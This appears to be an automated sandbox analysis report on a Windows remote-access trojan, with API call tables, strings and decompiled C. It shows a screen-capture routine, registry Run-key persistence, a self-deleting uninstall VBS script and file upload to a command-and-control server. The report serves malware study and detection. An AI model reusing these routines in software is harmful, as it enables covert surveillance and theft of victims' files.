                                  0x0040879d
                                  0x004087a6
                                  0x004087aa
                                  0x004087af
                                  0x004087b6
                                  0x004087bf
                                  0x004087c8
                                  0x004087d1
                                  0x004087d1
                                  0x004087d7
                                  0x004087e4
                                  0x004087f0
                                  0x004087f7
                                  0x004087fb
                                  0x00408804
                                  0x00408808
                                  0x0040880d
                                  0x00408814
                                  0x0040881d
                                  0x00408826
                                  0x0040882f
                                  0x00408839
                                  0x00408843
                                  0x00408843
                                  0x00408850
                                  0x0040885a
                                  0x0040885e
                                  0x00408867
                                  0x00408870
                                  0x00408874
                                  0x00408879
                                  0x00408880
                                  0x00408889
                                  0x00408892
                                  0x00408892
                                  0x00408898
                                  0x004088a9
                                  0x004088b4
                                  0x004088c0
                                  0x004088c7
                                  0x004088cb
                                  0x004088d4
                                  0x004088d8
                                  0x004088e1
                                  0x004088e5
                                  0x004088f1
                                  0x004088fa
                                  0x00408903
                                  0x0040890c
                                  0x00408915
                                  0x0040891e
                                  0x0040892c
                                  0x00408938
                                  0x00408942
                                  0x0040894e
                                  0x00408955
                                  0x0040895f
                                  0x00408967
                                  0x00408974
                                  0x0040897d
                                  0x00408980
                                  0x00408980
                                  0x0040897d
                                  0x00408989
                                  0x00408992
                                  0x0040899b
                                  0x004089a5

                                  APIs
                                    • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                    • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00408282
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 004082AC
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 004082C8
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 004082E8
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 00408321
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040832A
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000,00000208,00000000), ref: 0040834A
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00408368
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00408370
                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 00408378
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 00408394
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 004083A6
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 004083AD
                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 004083BF
                                    • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000528A,00000000,00000004,0041B310,004085CD), ref: 00406D56
                                    • Part of subcall function 00406D41: UnhookWindowsHookEx.USER32(00000000), ref: 00406D5F
                                    • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000526A,00000000), ref: 00406D6F
                                  • _wgetenv.MSVCRT ref: 004083DA
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 004083E5
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004083F0
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004083FB
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject"),?), ref: 0040840D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,On Error Resume Next,00000000), ref: 0040841D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408428
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,")), ref: 00408447
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,while fso.FileExists(",00000000), ref: 00408457
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408464
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408470
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408479
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408482
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040848B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ",?,?,00416354), ref: 004084A9
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004084B4
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004084C1
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004084CD
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004084D6
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004084DF
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004084E8
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(wend), ref: 004084FC
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 00408504
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,fso.DeleteFolder ",0041BC68,00416354), ref: 0040851B
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00416354), ref: 00408528
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00416354), ref: 00408534
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 0040853D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 00408546
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 00408554
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408560
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040856A
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408576
                                    • Part of subcall function 00412D56: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 0040858F
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040859C
                                  • exit.MSVCRT ref: 004085A3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$?c_str@?$basic_string@$??1?$basic_string@G@2@@0@V?$basic_string@$Hstd@@$V01@V10@Y?$basic_string@$??0?$basic_string@D@2@@std@@D@std@@FileG@1@@$TerminateV01@@V10@@$??9std@@AttributesThread$?length@?$basic_string@?size@?$basic_string@CreateDeleteExecuteHookModuleNameObjectProcessShellSingleUnhookWaitWindows_wgetenvexit
                                  • String ID: ")$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\uninstall.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                  • API String ID: 4026913539-546584676
                                  • Opcode ID: c0431d19fb75d3accf122d956e21a0eee54d605bc0c6247b88d50a3a2d2e7deb
                                  • Instruction ID: 4759749fa9a93480e8798f104ff06792d31013b0e42c9834499dc68fb1b0d0e4
                                  • Opcode Fuzzy Hash: c0431d19fb75d3accf122d956e21a0eee54d605bc0c6247b88d50a3a2d2e7deb
                                  • Instruction Fuzzy Hash: FA917172900509BBDB00EBE0ED4DAEE777CEF94305F14806AF902A2191DF795E44CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040FA46, Relevance: 91.3, APIs: 49, Strings: 3, Instructions: 318windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 62%
                                  			E0040FA46(void* __eflags, intOrPtr _a4, signed int _a8, char _a11, signed int _a12) {
				struct HDC__* _v8;
				void* _v12;
				struct HDC__* _v16;
				int _v20;
				int _v24;
				int _v28;
				char _v44;
				intOrPtr _v50;
				void* _v52;
				void* _v54;
				intOrPtr _v58;
				char _v60;
				char _v76;
				intOrPtr _v80;
				struct tagCURSORINFO _v96;
				signed int _v102;
				signed int _v104;
				long _v112;
				long _v116;
				char _v120;
				struct _ICONINFO _v140;
				int _t143;
				void* _t144;
				signed int _t153;
				long _t164;
				void* _t165;
				char* _t189;
				signed int _t193;
				void* _t214;
				signed int _t222;
				signed char _t224;
				signed int _t225;
				signed int _t242;
				struct HDC__* _t245;
				int _t249;
				struct tagBITMAPINFO* _t250;

				_t214 = 0;
				_t245 = CreateDCA("DISPLAY", 0, 0, 0);
				_v16 = _t245;
				_v8 = CreateCompatibleDC(_t245);
				_t248 = 0x41bfc8 + _a12 * 4;
				_v12 = E0040FECE( *((intOrPtr*)(0x41bfc8 + _a12 * 4)));
				_t143 = E0040FF18( *(0x41bfc8 + _a12 * 4));
				_v28 = _t143;
				if(_v12 != 0 || _t143 != 0) {
					_t144 = CreateCompatibleBitmap(_t245, _v12, _t143);
					_a12 = _t144;
					if(_t144 != _t214) {
						if(SelectObject(_v8, _t144) != 0) {
							_v24 = _t214;
							asm("stosd");
							E0040FF57( *_t248,  &_v24);
							if(StretchBlt(_v8, _t214, _t214, _v12, _v28, _v16, _v24, _v20, _v12, _v28, 0xcc0020) != 0) {
								if(_a8 != 0) {
									_v96.cbSize = 0x14;
									if(GetCursorInfo( &_v96) != 0 && GetIconInfo(_v96.hCursor,  &_v140) != 0) {
										DeleteObject(_v140.hbmColor);
										DeleteObject(_v140.hbmMask);
										DrawIcon(_v8, _v96.ptScreenPos - _v140.xHotspot - _v24, _v80 - _v140.yHotspot - _v20, _v96.hCursor);
										_t214 = 0;
									}
								}
								_push( &_v120);
								_t249 = 0x18;
								if(GetObjectA(_a12, _t249, ??) != 0) {
									_t153 = _v102 * _v104;
									_t242 = 1;
									if(_t153 != _t242) {
										_t222 = 4;
										if(_t153 > _t222) {
											_t222 = 8;
											if(_t153 <= _t222) {
												goto L18;
											}
											_t222 = 0x10;
											if(_t153 <= _t222) {
												goto L18;
											}
											if(_t153 > _t249) {
												_a8 = 0x20;
												L28:
												_push(0x28 + (_t242 << _a8) * 4);
												L23:
												_t250 = LocalAlloc(0x40, ??);
												_t224 = _a8;
												_t250->bmiHeader = 0x28;
												_t250->bmiHeader.biWidth = _v116;
												_t250->bmiHeader.biHeight = _v112;
												_t250->bmiHeader.biPlanes = _v104;
												_t250->bmiHeader.biBitCount = _v102;
												if(_t224 < 0x18) {
													_t193 = 1;
													_t250->bmiHeader.biClrUsed = _t193 << _t224;
												}
												_t225 = 8;
												asm("cdq");
												_t250->bmiHeader.biCompression = _t214;
												_t250->bmiHeader.biClrImportant = _t214;
												_t164 = (_t250->bmiHeader.biWidth + 7) / _t225 * (_a8 & 0x0000ffff) * _t250->bmiHeader.biHeight;
												_t250->bmiHeader.biSizeImage = _t164;
												_t165 = GlobalAlloc(_t214, _t164);
												_v12 = _t165;
												if(_t165 != _t214) {
													if(GetDIBits(_v8, _a12, _t214, _t250->bmiHeader.biHeight & 0x0000ffff, _t165, _t250, _t214) != 0) {
														_v60 = 0x4d42;
														_v54 = _t214;
														_v52 = _t214;
														_v58 = _t250->bmiHeader.biSizeImage + _t250->bmiHeader.biClrUsed * 4 + _t250->bmiHeader + 0xe;
														_v50 = _t250->bmiHeader + 0xe + _t250->bmiHeader.biClrUsed * 4;
														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_a11);
														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_a11);
														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z( &_v60, 0xe);
														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z(_t250, 0x28);
														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z(_v12, _t250->bmiHeader.biSizeImage);
														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
														DeleteObject(_a12);
														GlobalFree(_v12);
														DeleteDC(_v16);
														DeleteDC(_v8);
														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z( &_v76);
														__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
														__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
														goto L33;
													}
													DeleteDC(_v16);
													DeleteDC(_v8);
													DeleteObject(_a12);
													GlobalFree(_v12);
													_t189 =  &_a11;
												} else {
													DeleteDC(_v16);
													DeleteDC(_v8);
													DeleteObject(_a12);
													_t189 =  &_a11;
												}
												goto L31;
											}
											_a8 = _t249;
											_push(0x28);
											goto L23;
										}
										L18:
										_a8 = _t222;
										goto L28;
									}
									_a8 = _t242;
									goto L28;
								} else {
									DeleteDC(_v16);
									DeleteDC(_v8);
									DeleteObject(_a12);
									_t189 =  &_a11;
									goto L31;
								}
							}
							DeleteDC(_v16);
							DeleteDC(_v8);
							DeleteObject(_a12);
							_t189 =  &_a11;
							goto L31;
						}
						DeleteDC(_t245);
						DeleteDC(_v8);
						DeleteObject(_a12);
						_t189 =  &_a11;
						goto L31;
					}
					DeleteDC(_t245);
					DeleteDC(_v8);
					DeleteObject(_t214);
					_t189 =  &_a11;
					goto L31;
				} else {
					_t189 =  &_a11;
					L31:
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(0x415664, _t189);
					L33:
					return _a4;
				}
			}







































                                  0x0040fa51
                                  0x0040fa62
                                  0x0040fa65
                                  0x0040fa6e
                                  0x0040fa7b
                                  0x0040fa89
                                  0x0040fa8c
                                  0x0040fa96
                                  0x0040fa99
                                  0x0040faac
                                  0x0040fab4
                                  0x0040fab7
                                  0x0040fae2
                                  0x0040fb08
                                  0x0040fb0b
                                  0x0040fb12
                                  0x0040fb40
                                  0x0040fb6d
                                  0x0040fb72
                                  0x0040fb82
                                  0x0040fbb0
                                  0x0040fbb5
                                  0x0040fbbf
                                  0x0040fbc5
                                  0x0040fbc5
                                  0x0040fb82
                                  0x0040fbca
                                  0x0040fbcd
                                  0x0040fbda
                                  0x0040fbfe
                                  0x0040fc02
                                  0x0040fc06
                                  0x0040fc12
                                  0x0040fc16
                                  0x0040fc22
                                  0x0040fc26
                                  0x00000000
                                  0x00000000
                                  0x0040fc2a
                                  0x0040fc2e
                                  0x00000000
                                  0x00000000
                                  0x0040fc33
                                  0x0040fcc4
                                  0x0040fccb
                                  0x0040fcd7
                                  0x0040fc3e
                                  0x0040fc46
                                  0x0040fc48
                                  0x0040fc4f
                                  0x0040fc58
                                  0x0040fc5e
                                  0x0040fc65
                                  0x0040fc6d
                                  0x0040fc71
                                  0x0040fc75
                                  0x0040fc78
                                  0x0040fc78
                                  0x0040fc83
                                  0x0040fc84
                                  0x0040fc8b
                                  0x0040fc8e
                                  0x0040fc94
                                  0x0040fc9a
                                  0x0040fc9d
                                  0x0040fca5
                                  0x0040fca8
                                  0x0040fcf4
                                  0x0040fd2b
                                  0x0040fd3c
                                  0x0040fd40
                                  0x0040fd48
                                  0x0040fd57
                                  0x0040fd5e
                                  0x0040fd6b
                                  0x0040fd7a
                                  0x0040fd87
                                  0x0040fd93
                                  0x0040fda0
                                  0x0040fdaf
                                  0x0040fdbc
                                  0x0040fdc5
                                  0x0040fdca
                                  0x0040fdd9
                                  0x0040fdde
                                  0x0040fde7
                                  0x0040fdf0
                                  0x0040fdf9
                                  0x00000000
                                  0x0040fdf9
                                  0x0040fcff
                                  0x0040fd04
                                  0x0040fd09
                                  0x0040fd0e
                                  0x0040fd14
                                  0x0040fcaa
                                  0x0040fcb3
                                  0x0040fcb8
                                  0x0040fcbd
                                  0x0040fcbf
                                  0x0040fcbf
                                  0x00000000
                                  0x0040fca8
                                  0x0040fc39
                                  0x0040fc3c
                                  0x00000000
                                  0x0040fc3c
                                  0x0040fc18
                                  0x0040fc18
                                  0x00000000
                                  0x0040fc18
                                  0x0040fc08
                                  0x00000000
                                  0x0040fbdc
                                  0x0040fbe5
                                  0x0040fbea
                                  0x0040fbef
                                  0x0040fbf1
                                  0x00000000
                                  0x0040fbf1
                                  0x0040fbda
                                  0x0040fb4b
                                  0x0040fb50
                                  0x0040fb55
                                  0x0040fb5b
                                  0x00000000
                                  0x0040fb5b
                                  0x0040faeb
                                  0x0040faf0
                                  0x0040faf5
                                  0x0040fafb
                                  0x00000000
                                  0x0040fafb
                                  0x0040fac0
                                  0x0040fac5
                                  0x0040fac8
                                  0x0040face
                                  0x00000000
                                  0x0040fa9f
                                  0x0040fa9f
                                  0x0040fd17
                                  0x0040fd20
                                  0x0040fdff
                                  0x0040fe06
                                  0x0040fe06

                                  APIs
                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                  • CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                    • Part of subcall function 0040FECE: GetMonitorInfoW.USER32(?,?), ref: 0040FEEE
                                    • Part of subcall function 0040FF18: GetMonitorInfoW.USER32(0040FA91,?), ref: 0040FF38
                                  • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 0040FAAC
                                  • DeleteDC.GDI32(00000000), ref: 0040FAC0
                                  • DeleteDC.GDI32(00000000), ref: 0040FAC5
                                  • DeleteObject.GDI32(00000000), ref: 0040FAC8
                                  • SelectObject.GDI32(00000000,00000000), ref: 0040FADA
                                  • DeleteDC.GDI32(00000000), ref: 0040FAEB
                                  • DeleteDC.GDI32(00000000), ref: 0040FAF0
                                  • DeleteObject.GDI32(00410983), ref: 0040FAF5
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040FD5E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040FD6B
                                  • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00004D42,0000000E), ref: 0040FD7A
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FD87
                                  • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00000000,00000028), ref: 0040FD93
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FDA0
                                  • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,?), ref: 0040FDAF
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FDBC
                                  • DeleteObject.GDI32(00410983), ref: 0040FDC5
                                  • GlobalFree.KERNEL32 ref: 0040FDCA
                                  • DeleteDC.GDI32(00000000), ref: 0040FDD9
                                  • DeleteDC.GDI32(00000000), ref: 0040FDDE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040FDE7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FDF0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FDF9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$Delete$??0?$basic_string@ObjectV01@@$?assign@?$basic_string@CreateD@1@@V01@V12@Y?$basic_string@$??1?$basic_string@CompatibleInfoMonitor$BitmapFreeGlobalSelect
                                  • String ID: $BM$DISPLAY
                                  • API String ID: 585525397-871886180
                                  • Opcode ID: 876bd925b7c2d7ba203db6ddd87036fd97f3491858af2704dd42dcb20a0039ab
                                  • Instruction ID: 6bc9ab2a81804b36ace2e86e9fd4fad5708e5c5067481f6dd5077a8177631ab2
                                  • Opcode Fuzzy Hash: 876bd925b7c2d7ba203db6ddd87036fd97f3491858af2704dd42dcb20a0039ab
                                  • Instruction Fuzzy Hash: 17C1E37190020DEFDF209FA0DC849DEBBB9FF48314F10843AE915A62A0D735AA59DF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403816, Relevance: 91.3, APIs: 50, Strings: 2, Instructions: 302fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                  • CreateFileW.KERNEL32(0000FDE8,80000000,00000000,00000000,00000003,00000080,00000000,?,0041B310,00000000), ref: 00403845
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040385C
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • GetFileSize.KERNEL32(00000000,?,?,0041B310,00000000), ref: 0040387B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0000FDE8,?), ref: 004038AA
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Uploading file to C&C: ,00000000,?,?,?,?), ref: 004038C8
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Uploading file to C&C: ,00000000,?,?,?,?), ref: 004038D9
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004038EA
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004038F3
                                  • ??2@YAPAXI@Z.MSVCRT ref: 00403940
                                  • SetFilePointer.KERNEL32(?,?,?,?), ref: 00403954
                                  • ReadFile.KERNEL32(?,?,0000FDE8,?,?), ref: 00403968
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0000FDE8,?), ref: 00403978
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?), ref: 0040398E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403B9B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BA4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BAD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@??1?$basic_string@$File$G@2@@std@@G@std@@$D@1@@G@1@@V01@@$??2@CreateD@2@@0@Hstd@@PointerReadSizeV10@@V?$basic_string@socket
                                  • String ID: Uploading file to C&C: $[INFO]
                                  • API String ID: 368904453-3151135581
                                  • Opcode ID: 615b1700c6fa7c988836e9402474fc1b087ee783a9023c5bf4cee90924b5f3f1
                                  • Instruction ID: b6d78ebecc7f0a5a63fa064e60f12d61dcf64d9c80a512a797ec440d8275d993
                                  • Opcode Fuzzy Hash: 615b1700c6fa7c988836e9402474fc1b087ee783a9023c5bf4cee90924b5f3f1
                                  • Instruction Fuzzy Hash: B8C107B1C0010DEBDF05EFA1EC89DEEBB78EF54345F10806AF415A21A1EB755A89CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004130BF, Relevance: 86.0, APIs: 42, Strings: 7, Instructions: 239registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 004130DF
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 004130F5
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00413116
                                  • RegEnumKeyExA.ADVAPI32 ref: 00413135
                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00413160
                                  • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 004131DD
